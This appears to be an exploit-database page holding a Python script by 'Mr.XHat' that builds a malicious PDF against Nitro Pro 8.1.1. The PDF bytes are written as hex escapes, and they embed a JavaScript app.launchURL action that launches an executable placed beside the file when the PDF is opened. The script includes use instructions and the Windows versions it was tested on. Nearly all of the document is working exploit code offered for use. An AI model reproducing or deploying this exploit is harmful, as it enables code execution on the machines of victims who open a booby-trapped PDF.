Nitro Pro Remote Code Execution Exploit



EKU-ID: 3783 CVE: OSVDB-ID:
Author: Mr.XHat Published: 2014-01-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!\usr\bin\env python
  
# Exploit Title: Nitro Pro Remote Code Execution Exploit
# Date: 2013/03/15
# Exploit Author: Mr.XHat
# Discovered By: Mr.XHat
# Vendor Homepage: http://www.nitropdf.com/
# Software Link: http://www.rodfile.com/8178ciy92vu7
# Version: 8.1.1 Build 12
# Tested On: WinXP SP3 EN, Win7 SP1 EN
  
# How To Use: Put Your "*.exe" File Side The Exploit.pdf File.
  
Code = (
"\x25\x50\x44\x46\x2D\x31\x2E\x37\x0D\x25\xE2\xE3\xCF\xD3"+
"\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F"+
"\x54\x79\x70\x65\x20\x2F\x43\x61\x74\x61\x6C\x6F\x67\x0D"+
"\x0A\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x20\x35\x20\x30"+
"\x20\x52\x0D\x0A\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30"+
"\x20\x52\x0D\x0A\x2F\x41\x41\x20\x3C\x3C\x2F\x57\x43\x20"+
"\x3C\x3C\x2F\x53\x20\x2F\x4A\x61\x76\x61\x53\x63\x72\x69"+
"\x70\x74\x0D\x0A\x2F\x4A\x53\x20\x28\x78\x20\x3D\x20\x22"+
"\x50\x6f\x43\x2e\x65\x78\x65"+ # PoC.exe
"\x22\x3B\x20\x61\x70\x70\x2E\x6C\x61\x75\x6E\x63\x68\x55"+
"\x52\x4C\x5C\x28\x78\x2C\x20\x74\x72\x75\x65\x5C\x29\x3B"+
"\x29\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D"+
"\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F"+
"\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x6F\x64\x44\x61\x74\x65"+
"\x20\x28\x44\x3A\x32\x30\x31\x33\x30\x33\x31\x35\x31\x32"+
"\x35\x31\x31\x30\x2B\x30\x34\x27\x33\x30\x27\x29\x0D\x0A"+
"\x2F\x43\x72\x65\x61\x74\x6F\x72\x20\x28\x4E\x69\x74\x72"+
"\x6F\x20\x50\x72\x6F\x20\x38\x29\x0D\x0A\x3E\x3E\x0D\x0A"+
"\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62"+
"\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61"+
"\x67\x65\x0D\x0A\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20"+
"\x30\x20\x52\x0D\x0A\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78"+
"\x20\x5B\x30\x2E\x30\x30\x30\x30\x20\x37\x39\x32\x2E\x30"+
"\x30\x30\x30\x20\x36\x31\x32\x2E\x30\x30\x30\x30\x20\x30"+
"\x2E\x30\x30\x30\x30\x5D\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"+
"\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D"+
"\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61\x67\x65"+
"\x73\x0D\x0A\x2F\x43\x6F\x75\x6E\x74\x20\x31\x0D\x0A\x2F"+
"\x4B\x69\x64\x73\x20\x5B\x33\x20\x30\x20\x52\x5D\x0D\x0A"+
"\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20"+
"\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65"+
"\x20\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x0D\x0A\x2F\x43"+
"\x6F\x75\x6E\x74\x20\x30\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"+
"\x64\x6F\x62\x6A\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x30\x20"+
"\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20"+
"\x36\x35\x35\x33\x35\x20\x66\x0D\x0A\x30\x30\x30\x30\x30"+
"\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D"+
"\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x37\x36\x20\x30\x30"+
"\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30"+
"\x32\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30"+
"\x30\x30\x30\x30\x30\x30\x33\x35\x35\x20\x30\x30\x30\x30"+
"\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x31"+
"\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61"+
"\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F\x6F\x74\x20"+
"\x31\x20\x30\x20\x52\x0D\x0A\x2F\x49\x6E\x66\x6F\x20\x32"+
"\x20\x30\x20\x52\x0D\x0A\x2F\x53\x69\x7A\x65\x20\x36\x0D"+
"\x0A\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66"+
"\x0D\x0A\x34\x36\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A"
)
  
try:
        File = open("Exploit.pdf", "w")
        File.write(Code)
        File.close()
        print "\nFile Created Successfully!"
except:
        print "\nTry Again!"
  
# END